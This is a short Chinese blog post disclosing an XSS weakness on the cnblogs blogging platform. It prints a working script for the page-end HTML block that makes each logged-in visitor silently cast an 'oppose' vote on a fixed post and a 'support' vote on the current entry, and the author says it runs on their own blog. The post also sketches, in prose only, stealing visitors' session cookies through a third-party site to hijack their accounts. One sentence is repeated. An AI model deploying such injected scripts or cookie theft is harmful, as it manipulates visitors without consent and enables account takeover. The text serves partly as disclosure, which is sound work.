由《探讨下博客园的“反对”按钮》,发现的关于博客园xss漏洞
behaviour: 没一个已登陆用户访问我的博客,就会将你的原文,自动点击“反对”按钮按钮,投反对票。
代码:
<!--PageEndHtml Block Begin--> <script type="text/javascript"> |
|
$(function(){ | |
$.ajax({type:'post',url:'http://www.cnblogs.com/mvc/vote/VotePost.aspx',data:'{"postId":2863624,"voteType":"Bury","isAbandoned":false}',success:function(msg){/*console.log(msg);*/}}); | |
if (typeof cb_entryId!='undefined'){ | |
$.ajax({type:'post',url:'http://www.cnblogs.com/mvc/vote/VotePost.aspx',data:'{"postId":'+cb_entryId+',"voteType":"Digg","isAbandoned":false}',success:function(msg){/*console.log(msg);*/}}); | |
} | |
}) | |
</script> | |
<!--PageEndHtml Block End--> |
最糟糕的应用场景,就是将已登录用户的cookies,等记录session的信息,偷偷通过 getJSON 方式,提交给三方网站,
同时,利用chrome替换为用户登录态的cookies,做坏事!(场景应用前提:登陆session id cookies 跟 ip 不绑定。)
同时,利用chrome替换为用户登录态的cookies,做坏事!(场景应用前提:登陆session id cookies 跟 ip 不绑定。)
希望博客园能够禁用javascript..